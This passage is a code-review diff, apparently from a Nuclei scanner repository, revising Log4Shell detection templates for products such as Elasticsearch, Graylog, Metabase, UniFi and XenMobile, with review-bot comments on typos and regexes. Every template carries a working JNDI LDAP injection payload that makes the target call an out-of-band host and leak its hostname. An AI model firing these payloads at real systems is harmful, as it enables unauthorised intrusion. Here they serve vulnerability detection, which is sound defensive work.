- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/23
|
# Enhanced by md on 2023/03/23
|
||||||
|
|
|
@ -23,6 +23,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
|
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Referer: {{RootURL}}/mifs/user/login.jsp
|
Referer: {{RootURL}}/mifs/user/login.jsp
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -47,13 +51,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/23
|
# Enhanced by md on 2023/03/23
|
||||||
|
|
|
@ -21,10 +21,14 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
|
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
|
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
{
|
{
|
||||||
|
@ -44,17 +48,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2022/10/04
|
# Enhanced by md on 2022/10/04
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
|
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -33,7 +37,7 @@ http:
|
||||||
Origin: {{RootURL}}
|
Origin: {{RootURL}}
|
||||||
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
|
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
|
||||||
|
|
||||||
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
|
formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -46,7 +50,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
@ -61,10 +65,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by cs 2022/10/10
|
# Enhanced by cs 2022/10/10
|
||||||
|
|
|
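Review bot: The rewritten form body still sends `formPanel%3AloginGrid%3Avalue={{view}}}` with three closing braces, so a literal `}` is appended to that field, while `javax.faces.ViewState={{view}}` at the end of the same line is well-formed. It looks like a typo carried over from the old line; if it is not intentional, use `formPanel%3AloginGrid%3Avalue={{view}}`. Whether the login handler tolerates the stray character is not visible here, so it may or may not affect whether the `name` field reaches the logger and the template reports correctly.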
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
|
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -44,7 +48,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
@ -56,10 +60,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/23
|
# Enhanced by md on 2023/03/23
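Review bot: The group 2 extractor added in the `@ -56,10 +60,16 @` hunk (commented "Print injection point in output") lands on the `username` label only when `{{interactsh-url}}` expands to exactly three labels, which I assume is the usual `<id>.<domain>.<tld>` shape. Group 1 allows dots and is greedy and the pattern has no end anchor, so with a longer interaction-server domain group 1 becomes `<hostName>.username` and group 2 becomes the interaction id. The label is a literal in this template's payload, so pinning it keeps both extractors stable: `- '\d{6}\.([a-zA-Z0-9\.\-]+)\.username\.'` for the hostname and `- '\d{6}\.[a-zA-Z0-9\.\-]+\.(username)\.'` with `group: 1` for the injection point. The same pattern appears in every other template in this commit, each with its own label (`url`, `postdata`, `uri`, `xapiversion`).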
|
||||||
|
|
|
@ -20,10 +20,14 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
|
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -35,7 +39,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -47,8 +51,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
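Review bot: The comment on the matcher regex in the `@ -35,7 +39,7 @` hunk reads `# Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output`, which describes an extractor, not a matcher; the line it replaces said `# Match for extracted ${sys:os.name} variable`. It looks copied from the group 1 extractor at the end of the section. I would write `# Match the six-digit marker, ${hostName} and the injection-point label in the DNS callback` on the matcher and keep the "Print …" wording for the extractors only. The matcher lines of the other templates in this commit carry the same copied comment.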
|
||||||
|
|
|
@ -22,6 +22,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
|
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -29,7 +33,7 @@ http:
|
||||||
Referer: {{RootURL}}/opennms/login.jsp
|
Referer: {{RootURL}}/opennms/login.jsp
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -41,17 +45,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by cs on 2022/10/23
|
# Enhanced by cs on 2022/10/23
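Review bot: The injection-point label in the payload of the `@ -29,7 +33,7 @` hunk is `postdata`, while the templates earlier in this commit that inject into a login name field use `username`. The group 2 extractor prints this label as the "injection point", so results will name the same kind of location two different ways. For `j_username` I would use `${hostName}.username.{{interactsh-url}}` here. The templates tagged `rundeck` and `xenmobile` further down also use `postdata` for their login field, and the one tagged `unifi` uses it for the `remember` field, where `remember` would be the more precise label.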
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Connection: close
|
Connection: close
|
||||||
Referer: {{BaseURL}}/user/login
|
Referer: {{BaseURL}}/user/login
|
||||||
|
|
||||||
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -42,7 +46,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: location
|
part: location
|
||||||
|
@ -54,8 +58,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -22,6 +22,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
|
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -31,7 +35,7 @@ http:
|
||||||
Origin: {{RootURL}}
|
Origin: {{RootURL}}
|
||||||
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
|
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
|
||||||
|
|
||||||
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
|
{"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -43,13 +47,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/06/03
|
# Enhanced by mp on 2022/06/03
|
||||||
|
|
|
@ -21,10 +21,14 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
|
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
|
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -36,7 +40,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -48,8 +52,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
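Review bot: The new `path` entry in the `@ -21,10 +21,14 @` hunk writes `$` literally while still percent-encoding the braces, colons and slashes (`error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-…`), whereas the line it replaces encoded it as `%24`. Whether the target treats both forms the same cannot be told from this page, so either keep `%24%7B` throughout or add a comment saying why the `$` is now raw. The label `uri` also differs from the `url` label used for the query-parameter injection in the template tagged `metabase`, and the parameter here is named `error`; one naming scheme across the commit would make the extracted "injection point" easier to read.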
|
||||||
|
|
|
@ -11,6 +11,10 @@ info:
|
||||||
shodan-query: title:"XenMobile"
|
shodan-query: title:"XenMobile"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
|
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -23,7 +27,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
|
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
|
||||||
|
|
||||||
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
|
login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
|
